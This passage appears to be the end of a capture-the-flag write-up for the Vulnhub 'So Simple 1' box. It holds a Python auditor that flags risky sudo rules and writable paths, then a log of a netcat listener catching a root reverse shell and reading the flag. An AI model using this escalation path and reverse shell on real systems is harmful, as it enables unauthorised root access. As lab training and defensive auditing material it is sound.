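    if not path.startswith("/"):
        return [f"not an absolute path: {path}"]
    findings = []
    if os.path.basename(path) in SHELL_ESCAPE_BINARIES:
        findings.append(f"known shell escape: {os.path.basename(path)}")
    if not os.path.lexists(path):
        findings.append(f"target missing: {path}")
    else:
        st = os.lstat(path)
        if stat.S_ISLNK(st.st_mode):
            findings.append(f"target is a symlink: {path}")
        elif _writable_by_non_root(st):
            findings.append(f"target writable by non-root: {path}")
    # A writable ancestor lets a user create or replace the target; sticky
    # directories such as /tmp are skipped because others cannot rename there.
    parent = os.path.dirname(path)
    while parent:
        if os.path.isdir(parent):
            st = os.stat(parent)
            if _writable_by_non_root(st) and not st.st_mode & stat.S_ISVTX:
                findings.append(f"directory writable by non-root: {parent}")
        if parent == "/":
            break
        parent = os.path.dirname(parent)
    return findings


def audit_sudo_l(text):
    """Map each allowed command in `sudo -l` output to its findings."""
    return {r["command"]: audit_command(r["command"]) for r in parse_sudo_l(text)}


def demo():
    """Constructed layout mirroring the box: a world-writable 'opt' directory
    with no tools/server-health.sh underneath it, plus the service rule."""
    with tempfile.TemporaryDirectory() as base:
        opt = os.path.join(base, "opt")
        os.mkdir(opt)
        os.chmod(opt, 0o777)
        script = os.path.join(opt, "tools", "server-health.sh")
        text = ("User steven may run the following commands on so-simple:\n"
                f"    (root) NOPASSWD: {script}\n"
                "    (steven) NOPASSWD: /usr/sbin/service\n")
        return audit_sudo_l(text)


if __name__ == "__main__":
    for cmd, findings in demo().items():
        print(cmd, findings)
```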
┌──(kali㉿kali)-[~/Vulnhub/So_Simple1]
└─$ sudo nc -nlvp 6666
[sudo] password for kali:
listening on [any] 6666 ...
connect to [192.168.56.137] from (UNKNOWN) [192.168.56.171] 54008
root@so-simple:/opt/tools# id
id
uid=0(root) gid=0(root) groups=0(root)
root@so-simple:/opt/tools# cd /root
cd /root
root@so-simple:~# ls -alh
ls -alh
total 40K
drwx------ 5 root root 4.0K Jul 15 2020 .
drwxr-xr-x 20 root root 4.0K Jul 12 2020 ..
-rw-r--r-- 1 root root 3.1K Jul 15 2020 .bashrc
drwx------ 2 root root 4.0K Jul 12 2020 .cache
-rw------- 1 root root 28 Jul 15 2020 .lesshst
drwxr-xr-x 3 root root 4.0K Jul 12 2020 .local
-rw------- 1 root root 282 Jul 14 2020 .mysql_history
-rw-r--r-- 1 root root 161 Dec 5 2019 .profile
-rw-r--r-- 1 root root 3.7K Jul 12 2020 flag.txt
drwxr-xr-x 4 root root 4.0K Jul 12 2020 snap
root@so-simple:~# cat flag.txt
cat flag.txt
/$$$$$$ /$$ /$$
/$$__ $$ | $$ | $$
| $$ \__/ /$$$$$$ /$$$$$$$ /$$$$$$ /$$$$$$ /$$$$$$ /$$$$$$ /$$$$$$$$| $$
| $$ /$$__ $$| $$__ $$ /$$__ $$ /$$__ $$|____ $$|_ $$_/ |____ /$$/| $$
| $$ | $$ \ $$| $$ \ $$| $$ \ $$| $$ \__/ /$$$$$$$ | $$ /$$$$/ |__/
| $$ $$| $$ | $$| $$ | $$| $$ | $$| $$ /$$__ $$ | $$ /$$ /$$__/
| $$$$$$/| $$$$$$/| $$ | $$| $$$$$$$| $$ | $$$$$$$ | $$$$//$$$$$$$$ /$$
\______/ \______/ |__/ |__/ \____ $$|__/ \_______/ \___/ |________/|__/
/$$ \ $$
| $$$$$$/
\______/
/$$ /$$ /$$ /$$
| $$ /$$/ | $/ | $$
\ $$ /$$//$$$$$$ /$$ /$$|_//$$ /$$ /$$$$$$ /$$$$$$ /$$ /$$ /$$ /$$$$$$$ /$$$$$$ /$$$$$$$
\ $$$$//$$__ $$| $$ | $$ | $$ /$$//$$__ $$ /$$__ $$| $$ | $$ | $$| $$__ $$ /$$__ $$ /$$__ $$
\ $$/| $$ \ $$| $$ | $$ \ $$/$$/| $$$$$$$$ | $$ \ $$| $$ | $$ | $$| $$ \ $$| $$$$$$$$| $$ | $$
| $$ | $$ | $$| $$ | $$ \ $$$/ | $$_____/ | $$ | $$| $$ | $$ | $$| $$ | $$| $$_____/| $$ | $$
| $$ | $$$$$$/| $$$$$$/ \ $/ | $$$$$$$ | $$$$$$$/| $$$$$/$$$$/| $$ | $$| $$$$$$$| $$$$$$$
|__/ \______/ \______/ \_/ \_______/ | $$____/ \_____/\___/ |__/ |__/ \_______/ \_______/
| $$
/$$ /$$$$$$ /$$$$$$ /$$ | $$ /$$ /$$
| $//$$__ $$ /$$__ $$|__/ |__/ | $$ | $/
|_/| $$ \__/ /$$$$$$ | $$ \__/ /$$ /$$$$$$/$$$$ /$$$$$$ | $$ /$$$$$$|_/
| $$$$$$ /$$__ $$ | $$$$$$ | $$| $$_ $$_ $$ /$$__ $$| $$ /$$__ $$
\____ $$| $$ \ $$ \____ $$| $$| $$ \ $$ \ $$| $$ \ $$| $$| $$$$$$$$
/$$ \ $$| $$ | $$ /$$ \ $$| $$| $$ | $$ | $$| $$ | $$| $$| $$_____/
| $$$$$$/| $$$$$$/ | $$$$$$/| $$| $$ | $$ | $$| $$$$$$$/| $$| $$$$$$$
\______/ \______/ \______/ |__/|__/ |__/ |__/| $$____/ |__/ \_______/
| $$
| $$
|__/
Easy box right? Hope you've had fun! Show me the flag on Twitter @roelvb79
root@so-simple:~#
Root flag obtained!!!
Haha, this box's name is misleading: it is not simple at all!
Source: https://www.cnblogs.com/jason-huawen/p/16884208.html